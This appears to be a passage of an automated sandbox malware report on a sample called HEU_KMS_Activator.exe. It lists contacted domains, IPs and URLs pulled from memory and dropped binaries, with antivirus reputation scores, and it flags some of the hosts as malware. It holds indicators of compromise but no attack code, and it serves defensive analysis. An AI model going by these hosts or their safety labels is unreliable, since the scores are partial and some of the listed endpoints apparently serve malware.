Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
du.testjj.com10%VirustotalBrowse
www.wshifen.com0%VirustotalBrowse
da.testiu.com4%VirustotalBrowse
db.testyk.com10%VirustotalBrowse
time.windows.com0%VirustotalBrowse
www.baidu.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://curl.haxx.se/docs/http-cookies.html0%URL Reputationsafe
http://www.winimage.com/zLibDll0%URL Reputationsafe
http://ww25.da.testiu.com/api/v1/p?subid1=20240725-1019-566c-b20%Avira URL Cloudsafe
http://helgeklein.com.0%Avira URL Cloudsafe
https://du.testjj.com/api/v1/idt0%Avira URL Cloudsafe
https://du.testjj.com/api/v1/ido0%Avira URL Cloudsafe
https://dev.ditu.live.com/REST/v1/Routes/0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Routes/Driving0%Avira URL Cloudsafe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx0%Avira URL Cloudsafe
https://du.testjj.com/api/v1/ido12%VirustotalBrowse
https://dev.ditu.live.com/REST/v1/Routes/0%VirustotalBrowse
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx0%VirustotalBrowse
http://helgeklein.com.0%VirustotalBrowse
http://rk7.gndh888.top0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Routes/Driving0%VirustotalBrowse
http://rk7.gndh888.top0%VirustotalBrowse
https://msdn.itellyou.cn=======40%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Routes/Walking0%VirustotalBrowse
https://dev.virtualearth.net/REST/v1/Routes/Walking0%Avira URL Cloudsafe
https://du.testjj.com/api/v1/idt11%VirustotalBrowse
https://da.testiu.com0%Avira URL Cloudsafe
https://du.testjj.com0%Avira URL Cloudsafe
http://ww25.da.testiu.com/api/v1/p?subid1=20240725-1019-566c-b2dc-6815f46092600%Avira URL Cloudsafe
https://du.testjj.com/api/v1/ide0%Avira URL Cloudsafe
http://rk3.gndh888.tophttp://rk4.gndh888.tophttp://rk1.gndh888.top0%Avira URL Cloudsafe
https://du.testjj.com10%VirustotalBrowse
https://du.testjj.com/api/v1/idh0%Avira URL Cloudsafe
https://db.testyk.com/api/v1/p100%Avira URL Cloudmalware
https://du.testjj.com/api/v1/ide9%VirustotalBrowse
http://standards.iso.org/iso/19770/-2/2009/schema.xsd0%Avira URL Cloudsafe
https://curl.haxx.se/docs/http-cookies.html#0%Avira URL Cloudsafe
https://da.testiu.com4%VirustotalBrowse
http://standards.iso.org/iso/19770/-2/2009/schema.xsd0%VirustotalBrowse
https://du.testjj.com/api/v1/idh11%VirustotalBrowse
https://dev.ditu.live.com/mapcontrol/logging.ashx0%Avira URL Cloudsafe
https://db.testyk.com/api/v1/p11%VirustotalBrowse
http://www.autoitscript.com/images/autoit_6_240x100.jpg0%Avira URL Cloudsafe
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/0%Avira URL Cloudsafe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=0%Avira URL Cloudsafe
https://curl.haxx.se/docs/http-cookies.html#0%VirustotalBrowse
http://www.baidu.com/s?ie=utf-8&wd=ipm0%Avira URL Cloudsafe
http://www.debugbar.com/0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Transit/Schedules/0%Avira URL Cloudsafe
http://www.ccav1.comError0%Avira URL Cloudsafe
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/0%VirustotalBrowse
http://www.debugbar.com/1%VirustotalBrowse
http://www.baidu.com/s?ie=utf-8&wd=ipw0%Avira URL Cloudsafe
http://rk7.gndh888.tophttp://rk2.gndh888.top-sc=0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Transit/Schedules/0%VirustotalBrowse
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=0%VirustotalBrowse
https://dev.ditu.live.com/mapcontrol/logging.ashx0%VirustotalBrowse
http://www.autoitscript.com/images/autoit_6_240x100.jpg0%VirustotalBrowse
http://rk5.gndh888.top0%Avira URL Cloudsafe
http://rk6.gndh888.top0%Avira URL Cloudsafe
http://helgeklein.com/setacl/documentation/command-line-version-setacl-exe0%Avira URL Cloudsafe
http://www.ccav1.com0%Avira URL Cloudsafe
http://rk4.gndh888.top0%Avira URL Cloudsafe
http://rk5.gndh888.top0%VirustotalBrowse
http://www.autoitscript.com0%Avira URL Cloudsafe
http://rk3.gndh888.top0%Avira URL Cloudsafe
http://rk6.gndh888.top0%VirustotalBrowse
http://www.fiddlertool.com/fiddler/0%Avira URL Cloudsafe
http://www.bingmapsportal.com0%Avira URL Cloudsafe
http://rk1.gndh888.top0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/0%Avira URL Cloudsafe
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/0%Avira URL Cloudsafe
http://rk2.gndh888.top0%Avira URL Cloudsafe
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx0%Avira URL Cloudsafe
https://da.testiu.com/api/v1/p0%Avira URL Cloudsafe
https://du.testjj.comhttps://da.testiu.comhttps://db.testyk.com/api/v1/pContent-Type:application/x-w0%Avira URL Cloudsafe
https://du.testjj.com/api/v1/id0%Avira URL Cloudsafe
http://www.autoitscript.com/forum/0%Avira URL Cloudsafe
http://www.winimage.com/zLibDll1.2.30%Avira URL Cloudsafe
https://du.testjj.com/api/v1/id.0%Avira URL Cloudsafe
https://du.testjj.com/api/v1/idoESN0%Avira URL Cloudsafe
http://validator.w3.org/0%Avira URL Cloudsafe
http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a1100%Avira URL Cloudmalware
https://dev.ditu.live.com/REST/v1/Transit/Stops/0%Avira URL Cloudsafe
https://du.testjj.com/api/v1/id70%Avira URL Cloudsafe
https://dynamic.api.tilep0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Routes/0%Avira URL Cloudsafe
https://du.testjj.com/api/v1/id:0%Avira URL Cloudsafe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=0%Avira URL Cloudsafe
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=0%Avira URL Cloudsafe
https://g.live.com/odclientsettings/ProdV21C:0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
http://slayeroffice.com/tools/modi/v2.0/modi_help.html0%Avira URL Cloudsafe
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?0%Avira URL Cloudsafe
http://www.baidu.com/s?ie=utf-8&wd=ipUrlTest10%Avira URL Cloudsafe
https://du.testjj.com/api/v1/id$0%Avira URL Cloudsafe
https://du.testjj.comhttps://da.testiu.comhttps://db.testyk.com/api/v1/pinvalid0%Avira URL Cloudsafe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=0%Avira URL Cloudsafe
https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/0%Avira URL Cloudsafe
http://rk5.gndh888.tophttp://rk6.gndh888.top0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Locations0%Avira URL Cloudsafe
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/0%Avira URL Cloudsafe
https://dev.virtualearth.net/mapcontrol/logging.ashx0%Avira URL Cloudsafe
http://helgeklein.com/setacl/0%Avira URL Cloudsafe
https://db.testyk.com100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
du.testjj.com
72.52.179.174
truefalseunknown
www.wshifen.com
103.235.46.96
truefalseunknown
da.testiu.com
103.224.212.216
truefalseunknown
db.testyk.com
103.224.212.211
truefalseunknown
time.windows.com
unknown
unknownfalseunknown
www.baidu.com
unknown
unknownfalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://db.testyk.com/api/v1/pfalse
  • 11%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://da.testiu.com/api/v1/pfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://ww25.da.testiu.com/api/v1/p?subid1=20240725-1019-566c-b2wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://du.testjj.com/api/v1/idoJ8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmptrue
  • 12%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://du.testjj.com/api/v1/idtJ8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmptrue
  • 11%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://helgeklein.com.7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr, SetACL.exe0.34.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000005.00000003.1373416662.00000211DEE67000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://msdn.itellyou.cn=======4kms_x64.exe, 0000002B.00000002.2509975294.0000018A2B459000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://rk7.gndh888.topKMDF_LOOK.sys.1.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://du.testjj.comHEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wuhost.exe.1.dr, wrme.exe.1.drtrue
  • 10%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://ww25.da.testiu.com/api/v1/p?subid1=20240725-1019-566c-b2dc-6815f4609260wrme.exe, 00000011.00000003.1323957817.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323633808.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323988394.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323514417.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1324021871.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1324021871.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323514417.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323633808.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://da.testiu.comwrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wuhost.exe.1.dr, wrme.exe.1.drfalse
  • 4%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://du.testjj.com/api/v1/ideJ8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmptrue
  • 9%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://rk3.gndh888.tophttp://rk4.gndh888.tophttp://rk1.gndh888.topHEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://du.testjj.com/api/v1/idhJ8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmptrue
  • 11%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://standards.iso.org/iso/19770/-2/2009/schema.xsdsvchost.exe, 0000001C.00000002.2508919477.00000254A4702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2508107758.00000254A3E87000.00000004.00000020.00020000.00000000.sdmp, regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.28.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://curl.haxx.se/docs/http-cookies.htmlJ8156NOVDEC.exe, J8156NOVDEC.exe, 00000003.00000002.2505833885.0000000000CBD000.00000004.00000001.01000000.00000006.sdmp, J8156NOVDEC.exe, 00000003.00000000.1258257647.0000000000CBD000.00000008.00000001.01000000.00000006.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, _J8156NOVDEC.exe.1.dr, J8156NOVDEC.exe.2.dr, wuhost.exe.1.dr, wrme.exe.1.dr, nsjB6CE.tmp.1.drfalse
  • URL Reputation: safe
unknown
https://curl.haxx.se/docs/http-cookies.html#J8156NOVDEC.exe, wrme.exefalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.autoitscript.com/images/autoit_6_240x100.jpgHEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374424171.00000211DEE70000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.baidu.com/s?ie=utf-8&wd=ipmJ8156NOVDEC.exe, 00000003.00000002.2507675639.000000000130C000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.debugbar.com/HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000005.00000002.1374288589.00000211DEE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.ccav1.comErrorHEU_KMS_Activator.exefalse
  • Avira URL Cloud: safe
unknown
http://www.baidu.com/s?ie=utf-8&wd=ipwJ8156NOVDEC.exe, 00000003.00000002.2507675639.000000000130C000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://rk7.gndh888.tophttp://rk2.gndh888.top-sc=HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://rk5.gndh888.topHEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://rk6.gndh888.topHEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://helgeklein.com/setacl/documentation/command-line-version-setacl-exe7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr, SetACL.exe0.34.drfalse
  • Avira URL Cloud: safe
unknown
http://www.ccav1.comHEU_KMS_Activator.exefalse
  • Avira URL Cloud: safe
unknown
http://rk4.gndh888.topHEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drfalse
  • Avira URL Cloud: safe
unknown
http://www.autoitscript.comHEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://rk3.gndh888.topHEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drfalse
  • Avira URL Cloud: safe
unknown
http://www.fiddlertool.com/fiddler/HEU_KMS_Activator.exe, 00000004.00000002.2509398500.00000000018C8000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.bingmapsportal.comsvchost.exe, 00000005.00000002.1374180944.00000211DEE13000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000003.1373456417.00000211DEE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373596706.00000211DEE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://rk1.gndh888.topHEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drfalse
  • Avira URL Cloud: safe
unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374406045.00000211DEE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373416662.00000211DEE67000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://rk2.gndh888.topHEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drfalse
  • Avira URL Cloud: safe
unknown
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://du.testjj.com/api/v1/idnsjB6CE.tmp.1.drtrue
  • Avira URL Cloud: safe
unknown
https://du.testjj.comhttps://da.testiu.comhttps://db.testyk.com/api/v1/pContent-Type:application/x-wHEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
http://www.autoitscript.com/forum/HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.winimage.com/zLibDll1.2.3HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://du.testjj.com/api/v1/id.J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://du.testjj.com/api/v1/idoESNJ8156NOVDEC.exe, 00000003.00000002.2507675639.0000000001327000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
http://validator.w3.org/HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a1wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000005.00000003.1373220888.00000211DEE74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374445423.00000211DEE76000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://du.testjj.com/api/v1/id7J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://dynamic.api.tilepsvchost.exe, 00000005.00000002.1374288589.00000211DEE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374406045.00000211DEE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373416662.00000211DEE67000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000005.00000003.1373456417.00000211DEE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://du.testjj.com/api/v1/id:J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.1267630404.00000211DEE36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373620330.00000211DEE48000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000005.00000002.1374288589.00000211DEE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373518440.00000211DEE5E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000016.00000003.1281171307.000002C2B7190000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.drfalse
  • Avira URL Cloud: safe
unknown
http://crl.ver)svchost.exe, 00000016.00000002.2513917571.000002C2B7400000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://slayeroffice.com/tools/modi/v2.0/modi_help.htmlHEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000005.00000003.1373456417.00000211DEE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.baidu.com/s?ie=utf-8&wd=ipUrlTest1HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe, 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000000.1250640362.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, J8156NOVDEC.exe, 00000003.00000000.1258172666.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, J8156NOVDEC.exe, 00000003.00000002.2505697815.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, _J8156NOVDEC.exe.1.dr, J8156NOVDEC.exe.2.dr, nsjB6CE.tmp.1.drfalse
  • Avira URL Cloud: safe
unknown
https://du.testjj.com/api/v1/id$J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://du.testjj.comhttps://da.testiu.comhttps://db.testyk.com/api/v1/pinvalidHEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.drtrue
  • Avira URL Cloud: safe
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000005.00000003.1373620330.00000211DEE48000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/svchost.exe, 00000005.00000003.1267630404.00000211DEE36000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://rk5.gndh888.tophttp://rk6.gndh888.topHEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://helgeklein.com/setacl/7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr, SetACL.exe0.34.drfalse
  • Avira URL Cloud: safe
unknown
https://db.testyk.comHEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wuhost.exe.1.dr, wrme.exe.1.drfalse
  • Avira URL Cloud: malware
unknown
